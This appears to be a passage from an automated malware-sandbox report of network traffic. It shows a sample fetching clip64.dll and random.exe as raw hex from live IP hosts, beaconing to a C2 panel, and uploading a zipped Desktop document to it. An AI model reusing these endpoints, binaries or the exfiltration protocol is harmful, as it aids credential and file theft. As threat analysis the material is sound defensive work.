                                                                                                                                                                                                                                      Data Ascii: MIK0Fq+<:RKSRL.BZU=-*,!;*GDF[7JMmL>s][:V+5OW|~V:6,d97J]fI$J[#YnI_A0 ^4pd@!cdNZ)$MVJ# Ja%T9K9-pLd`4KP
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:04.554708958 CEST1289INData Raw: 85 81 e7 57 d4 88 52 40 1f c3 87 6a 66 94 4d c4 ac d2 53 5b 72 7a 14 08 66 a8 5d 84 31 e6 5e 20 2e 5a 47 98 4a 94 71 53 89 b8 2a 5a 15 b7 4d ad 26 b4 18 74 53 d3 d7 a1 b9 5a be 91 97 57 01 6a 77 98 7c 8a 3d 8e 4d 78 40 76 17 68 bf 7a 3e 59 35 65
                                                                                                                                                                                                                                      Data Ascii: WR@jfMS[rzf]1^ .ZGJqS*ZM&tSZWjw|=Mx@vhz>Y5e:j>*AtEm"e;+t2"f@D [Pon_?VOU+M3Ky-kUc2:F!qtW(D`p)a@v$,&r)pZl6T*SD7/3NcpGW[H3X


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      3192.168.2.549716193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:06.864746094 CEST69OUTGET /Pneh2sXQk0/Plugins/clip64.dll HTTP/1.1
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:07.115953922 CEST1289INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:06 GMT
                                                                                                                                                                                                                                      Content-Type: application/octet-stream
                                                                                                                                                                                                                                      Content-Length: 112128
                                                                                                                                                                                                                                      Last-Modified: Sun, 03 Mar 2024 11:54:32 GMT
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      ETag: "65e464f8-1b600"
                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                      Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 27 f6 04 b3 63 97 6a e0 63 97 6a e0 63 97 6a e0 38 ff 69 e1 69 97 6a e0 38 ff 6f e1 eb 97 6a e0 38 ff 6e e1 71 97 6a e0 b6 fa 6e e1 6c 97 6a e0 b6 fa 69 e1 72 97 6a e0 b6 fa 6f e1 42 97 6a e0 38 ff 6b e1 64 97 6a e0 63 97 6b e0 02 97 6a e0 f8 f9 63 e1 60 97 6a e0 f8 f9 6a e1 62 97 6a e0 f8 f9 95 e0 62 97 6a e0 f8 f9 68 e1 62 97 6a e0 52 69 63 68 63 97 6a e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 6a 12 e4 65 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 18 00 24 01 00 00 9a 00 00 00 00 00 00 ec 66 00 00 00 10 00 00 00 40 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 02 00 00 04 00 00 00 00 00 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 20 a1 01 00 9c 00 00 00 bc a1 01 00 50 00 00 00 00 d0 01 00 f8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 01 00 d4 14 00 00 f0 8f 01 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 90 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 40 01 00 4c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 36 23 01 00 00 10 00 00 00 24 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 34 69 00 00 00 40 01 00 00 6a 00 00 00 28 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 1c 17 00 00 00 b0 01 00 00 0c 00 00 00 92 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f8 00 00 00 00 d0 01 00 00 02 00 00 00 9e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d4 14 00 00 00 e0 01 00 00 16 00 00 00 a0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$'cjcjcj8iij8oj8nqjnljirjoBj8kdjckjc`jjbjbjhbjRichcjPELje!$f@@ P8(@@L.text6#$ `.rdata4i@j(@@.data@.rsrc@@.reloc@B
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:07.115993023 CEST1289INData Raw: 00 00 6a 20 68 08 8d 01 10 b9 60 b8 01 10 e8 0f 44 00 00 68 e0 2c 01 10 e8 7d 51 00 00 59 c3 cc cc cc 6a 20 68 2c 8d 01 10 b9 78 b8 01 10 e8 ef 43 00 00 68 40 2d 01 10 e8 5d 51 00 00 59 c3 cc cc cc 6a 14 68 50 8d 01 10 b9 90 b8 01 10 e8 cf 43 00
                                                                                                                                                                                                                                      Data Ascii: j h`Dh,}QYj h,xCh@-]QYjhPCh-=QYjhhCh.QYjhCh`.PYjhoCh.PYjhOCh /PYjh/C
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:07.116034985 CEST1289INData Raw: ff ff 50 c7 85 9c fb ff ff 0f 00 00 00 c6 85 88 fb ff ff 00 e8 00 3f 00 00 c6 45 fc 06 8d b5 88 fb ff ff 83 bd 9c fb ff ff 10 8b bd 88 fb ff ff 8b 95 e8 fb ff ff 0f 43 f7 8b 85 ec fb ff ff 8b 8d 98 fb ff ff 2b c2 89 b5 b0 fb ff ff 89 95 ac fb ff
                                                                                                                                                                                                                                      Data Ascii: P?EC+Q;wCCPs VQTDEr+Hr#+QW9H
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:07.116075039 CEST1289INData Raw: a1 50 b9 01 10 41 81 f9 00 10 00 00 72 16 8b 50 fc 83 c1 23 2b c2 83 c0 fc 83 f8 1f 0f 87 ef 00 00 00 8b c2 51 50 e8 f7 43 00 00 83 c4 08 c7 05 60 b9 01 10 00 00 00 00 c7 05 64 b9 01 10 0f 00 00 00 c6 05 50 b9 01 10 00 0f 10 06 0f 11 05 50 b9 01
                                                                                                                                                                                                                                      Data Ascii: PArP#+QPC`dPP~Ff`FFUr(MBrI#+wzRQCEUEEEr(MBrI#+w1RQ;CtuZ
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:07.116141081 CEST1289INData Raw: 00 00 c6 06 00 c7 45 fc 00 00 00 00 0f 57 c0 66 0f d6 45 e4 c7 45 ec 00 00 00 00 68 00 04 00 00 c7 45 d0 01 00 00 00 c7 45 e4 00 00 00 00 c7 45 e8 00 00 00 00 c7 45 ec 00 00 00 00 e8 09 3f 00 00 8b f8 b9 00 01 00 00 83 c8 ff 89 7d e4 83 c4 04 8d
                                                                                                                                                                                                                                      Data Ascii: EWfEEhEEEE?}UUE3EB@|E3M3U_9PvxErEt\xFNU;Ns~AFrDuEuQ
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:07.116179943 CEST1289INData Raw: 00 00 89 4d cc c6 06 00 bb 01 00 00 00 33 ff 89 5d d0 85 c9 0f 8e e4 00 00 00 0f 1f 40 00 c7 45 e4 00 00 00 00 c7 45 e8 0f 00 00 00 c6 45 d4 00 3b c7 0f 82 14 01 00 00 2b c7 b9 02 00 00 00 3b c1 0f 42 c8 83 7d 1c 10 8d 45 08 0f 43 45 08 51 03 c7
                                                                                                                                                                                                                                      Data Ascii: M3]@EEE;+;B}ECEQMP/]EE}jCEjPvNV];sAFrDuEuQ2EUr(MBrI#+wpRQ(9;}}
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:07.116220951 CEST1289INData Raw: 45 fc 00 00 00 00 8d 4d c0 6a 24 68 50 8e 01 10 c7 45 d0 00 00 00 00 c7 45 d4 0f 00 00 00 c6 45 c0 00 e8 ce 2a 00 00 c6 45 fc 01 8b 45 18 85 c0 75 07 33 f6 e9 dc 00 00 00 33 ff 85 c0 0f 84 cd 00 00 00 66 90 c7 45 e8 00 00 00 00 c7 45 ec 0f 00 00
                                                                                                                                                                                                                                      Data Ascii: EMj$hPEEE*EEu33fEEE;u+;B}ECEQMPs*EEePN(EEP7(E0EUr,MBrI#+
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:07.116267920 CEST1289INData Raw: 89 0d 00 00 00 00 59 5f 5e 8b e5 5d c3 e8 ea 68 00 00 cc cc cc cc cc cc cc cc cc cc 55 8b ec 6a ff 68 20 2b 01 10 64 a1 00 00 00 00 50 83 ec 40 a1 08 b0 01 10 33 c5 89 45 f0 56 50 8d 45 f4 64 a3 00 00 00 00 83 ec 18 c7 45 fc 01 00 00 00 8b cc 89
                                                                                                                                                                                                                                      Data Ascii: Y_^]hUjh +dP@3EVPEdEejhxAA{%EE ePV#EEPD#ME(0EEeP##EjhAA%Ed0
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:07.116308928 CEST1289INData Raw: 10 f3 0f 7e 46 10 66 0f d6 05 90 b9 01 10 c7 46 10 00 00 00 00 c7 46 14 0f 00 00 00 c6 06 00 8b 55 cc 83 fa 10 72 2c 8b 4d b8 42 8b c1 81 fa 00 10 00 00 72 14 8b 49 fc 83 c2 23 2b c1 83 c0 fc 83 f8 1f 0f 87 aa 12 00 00 52 51 e8 a5 2a 00 00 83 c4
                                                                                                                                                                                                                                      Data Ascii: ~FfFFUr,MBrI#+RQ*uEePlEjhAAV E0EEEHE;0+;B}ECEMVP r.ArP
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:07.116352081 CEST1289INData Raw: c4 30 c7 45 c8 00 00 00 00 c7 45 cc 0f 00 00 00 c6 45 b8 00 8d 48 ff b8 b0 b9 01 10 39 0d c0 b9 01 10 0f 42 0d c0 b9 01 10 83 3d c4 b9 01 10 10 51 0f 43 05 b0 b9 01 10 8d 4d b8 50 e8 99 1b 00 00 8b 0d c4 b9 01 10 83 f9 10 72 2e a1 b0 b9 01 10 41
                                                                                                                                                                                                                                      Data Ascii: 0EEEH9B=QCMPr.ArP#+wQPu%EU~EMfAA9B=RCPMt|
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:07.366782904 CEST1289INData Raw: fa 10 72 2c 8b 4d b8 42 8b c1 81 fa 00 10 00 00 72 14 8b 49 fc 83 c2 23 2b c1 83 c0 fc 83 f8 1f 0f 87 d4 08 00 00 52 51 e8 b6 20 00 00 83 c4 08 83 ec 18 8b cc 89 65 d4 68 78 b8 01 10 e8 7f 14 00 00 83 ec 18 c6 45 fc 12 8b cc 68 c8 b9 01 10 e8 6c
                                                                                                                                                                                                                                      Data Ascii: r,MBrI#+RQ ehxEhlME0t|r.ArP#+dQP? ~FfFFUr,


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      4192.168.2.549717193.233.132.56803356C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:07.505716085 CEST176OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 21
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 63 72 65 64 3d
                                                                                                                                                                                                                                      Data Ascii: id=246122658369&cred=
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:07.749847889 CEST190INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:07 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:17.858675003 CEST172OUTPOST /Pneh2sXQk0/index.php?wal=1 HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----NDYyMQ==
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4781
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:17.858675003 CEST140OUTData Raw: 2d 2d 2d 2d 2d 2d 4e 44 59 79 4d 51 3d 3d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 32 34 36 31 32 32 36 35 38 33 36
                                                                                                                                                                                                                                      Data Ascii: ------NDYyMQ==Content-Disposition: form-data; name="data"; filename="246122658369_Desktop.zip"Content-Type: application/octet-stream
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:17.858720064 CEST8OUTData Raw: 50 4b 03 04 14 00 00 00
                                                                                                                                                                                                                                      Data Ascii: PK
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:17.858741045 CEST8OUTData Raw: 08 00 1d 82 44 57 19 a3
                                                                                                                                                                                                                                      Data Ascii: DW
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:17.858772039 CEST8OUTData Raw: 19 73 86 02 00 00 02 04
                                                                                                                                                                                                                                      Data Ascii: s
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:17.858858109 CEST8OUTData Raw: 00 00 17 00 00 00 5f 46
                                                                                                                                                                                                                                      Data Ascii: _F
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:17.858858109 CEST8OUTData Raw: 69 6c 65 73 5f 5c 42 4a
                                                                                                                                                                                                                                      Data Ascii: iles_\BJ
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:17.858858109 CEST8OUTData Raw: 5a 46 50 50 57 41 50 54
                                                                                                                                                                                                                                      Data Ascii: ZFPPWAPT
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:17.858858109 CEST8OUTData Raw: 2e 64 6f 63 78 15 93 49
                                                                                                                                                                                                                                      Data Ascii: .docxI
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:17.858905077 CEST8OUTData Raw: 8e 40 21 08 44 f7 9d f4
                                                                                                                                                                                                                                      Data Ascii: @!D
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:17.858905077 CEST8OUTData Raw: a1 10 bf 38 82 f3 74 ff
                                                                                                                                                                                                                                      Data Ascii: 8t
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:18.137715101 CEST190INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:18 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      5192.168.2.549718193.233.132.56801164C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:08.315222025 CEST159OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 5
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 77 6c 74 3d 31
                                                                                                                                                                                                                                      Data Ascii: wlt=1
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:08.573810101 CEST719INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:08 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 32 31 30 0d 0a 20 2b 2b 2b 5f 31 5f 61 30 31 39 39 36 36 34 31 64 61 32 63 61 66 38 66 32 30 61 30 39 62 65 64 64 31 65 32 38 61 62 64 30 31 66 62 61 35 35 64 66 32 33 63 61 61 61 62 33 62 62 37 62 65 65 61 39 66 62 62 35 31 61 36 38 62 64 65 35 36 61 36 30 37 31 38 62 37 33 63 34 30 64 2d 31 2d 5f 32 5f 66 32 30 32 39 66 32 63 32 62 66 64 38 34 63 62 61 30 35 30 35 61 66 35 39 62 30 63 37 63 39 61 38 36 34 36 65 66 31 33 38 66 32 65 62 61 66 34 66 66 62 31 37 62 64 66 61 66 61 66 65 32 36 65 33 39 65 66 62 36 33 31 32 37 32 34 66 64 37 66 63 33 37 65 2d 32 2d 5f 33 5f 38 65 31 65 66 65 36 36 31 65 39 39 63 32 62 38 61 62 30 39 33 62 66 37 66 37 32 33 30 37 38 62 63 30 34 61 62 34 34 35 64 61 32 63 38 61 66 39 61 63 66 61 30 62 64 38 66 35 66 30 62 61 31 62 34 35 66 38 2d 33 2d 5f 34 5f 38 36 33 38 63 64 36 66 30 38 61 38 64 39 62 64 62 30 30 66 30 32 38 38 66 63 30 66 31 63 39 38 66 66 37 35 62 39 36 61 62 63 36 63 61 35 66 39 62 61 65 32 32 63 64 37 65 34 64 34 39 35 34 62 36 33 65 38 2d 34 2d 5f 35 5f 66 36 34 38 64 64 37 37 33 34 38 33 38 35 65 31 62 66 30 30 35 65 61 64 65 39 33 65 30 37 65 38 64 62 35 66 39 38 34 61 62 63 32 61 62 62 39 65 38 62 66 65 30 36 66 31 64 61 63 33 65 30 35 30 33 39 63 35 66 32 34 37 34 61 37 66 66 32 36 36 61 30 37 30 64 37 38 63 34 61 62 66 63 61 61 62 64 63 30 66 62 30 66 65 65 30 33 39 39 33 33 39 61 36 65 32 35 61 34 61 31 63 34 32 31 36 63 39 65 35 33 37 31 63 39 32 61 32 38 66 36 35 30 35 38 38 31 37 32 66 35 62 35 30 36 62 39 37 36 33 39 64 65 32 38 31 30 65 31 66 35 36 37 31 38 35 32 35 63 31 62 66 65 39 65 38 39 39 30 66 2d 35 2d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 210 +++_1_a01996641da2caf8f20a09bedd1e28abd01fba55df23caaab3bb7beea9fbb51a68bde56a60718b73c40d-1-_2_f2029f2c2bfd84cba0505af59b0c7c9a8646ef138f2ebaf4ffb17bdfafafe26e39efb6312724fd7fc37e-2-_3_8e1efe661e99c2b8ab093bf7f723078bc04ab445da2c8af9acfa0bd8f5f0ba1b45f8-3-_4_8638cd6f08a8d9bdb00f0288fc0f1c98ff75b96abc6ca5f9bae22cd7e4d4954b63e8-4-_5_f648dd77348385e1bf005eade93e07e8db5f984abc2abb9e8bfe06f1dac3e05039c5f2474a7ff266a070d78c4abfcaabdc0fb0fee0399339a6e25a4a1c4216c9e5371c92a28f650588172f5b506b97639de2810e1f56718525c1bfe9e8990f-5-0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      6192.168.2.549719193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:11.518091917 CEST186OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 31
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 64 31 3d 31 30 30 30 30 35 34 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                                                                                                                                                                                      Data Ascii: d1=1000054001&unit=246122658369
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:11.769224882 CEST193INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:11 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 4 <c>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      7192.168.2.549720193.233.132.167804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:12.018898964 CEST56OUTGET /mine/random.exe HTTP/1.1
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:12.260936975 CEST1289INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:12 GMT
                                                                                                                                                                                                                                      Content-Type: application/octet-stream
                                                                                                                                                                                                                                      Content-Length: 1166336
                                                                                                                                                                                                                                      Last-Modified: Fri, 19 Apr 2024 00:36:20 GMT
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      ETag: "6621bc84-11cc00"
                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                      Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9a c7 83 ae de a6 ed fd de a6 ed fd de a6 ed fd 6a 3a 1c fd fd a6 ed fd 6a 3a 1e fd 43 a6 ed fd 6a 3a 1f fd fd a6 ed fd 40 06 2a fd df a6 ed fd 8c ce e8 fc f3 a6 ed fd 8c ce e9 fc cc a6 ed fd 8c ce ee fc cb a6 ed fd d7 de 6e fd d7 a6 ed fd d7 de 7e fd fb a6 ed fd de a6 ec fd f7 a4 ed fd 7b cf e3 fc 8e a6 ed fd 7b cf ee fc df a6 ed fd 7b cf 12 fd df a6 ed fd de a6 7a fd df a6 ed fd 7b cf ef fc df a6 ed fd 52 69 63 68 de a6 ed fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 84 bc 21 66 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 10 00 ac 09 00 00 1c 08 00 00 00 00 00 77 05 02 00 00 10 00 00 00 c0 09 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 30 12 00 00 04 00 00 94 fe 11 00 02 00 40 80 00 00 40 00 00 10 00 00 00 00 40 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 64 8e 0c 00 7c 01 00 00 00 40 0d 00 7c 61 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 11 00 94 75 00 00 f0 0f 0b 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 34 0c 00 18 00 00 00 10 10 0b 00 40 00 00 00 00 00 00 00 00 00 00 00 00 c0 09 00 94 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 1d ab 09 00 00 10 00 00 00 ac 09 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 82 fb 02 00 00 c0 09 00 00 fc 02 00 00 b0 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 6c 70 00 00 00 c0 0c 00 00 48 00 00 00 ac 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 7c 61 04 00 00 40 0d 00 00 62 04 00 00 f4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 94 75 00 00 00 b0 11 00 00 76 00 00 00 56 11 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                      Data Ascii: MZ@ !L!This program cannot be run in DOS mode.$j:j:Cj:@*n~{{{z{RichPEL!f"w@0@@@d|@|au4@.text `.rdata@@.datalpH@.rsrc|a@b@@.relocuvV@B
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:12.260978937 CEST1289INData Raw: 00 00 00 00 b9 74 0a 4d 00 e8 38 fd 01 00 68 e9 23 44 00 e8 8f f0 01 00 59 c3 68 f3 23 44 00 e8 83 f0 01 00 59 c3 e8 e6 de 01 00 68 f8 23 44 00 e8 72 f0 01 00 59 c3 e8 59 3c 00 00 68 fd 23 44 00 e8 61 f0 01 00 59 c3 51 e8 a9 00 00 00 68 02 24 44
                                                                                                                                                                                                                                      Data Ascii: tM8h#DYh#DYh#DrYY<h#DaYQh$DOY0MQ@0MP#h$D/Y%h$DYh!$DYA2h&$DYPh0$DY%Mh?$DYVNNj(VYY
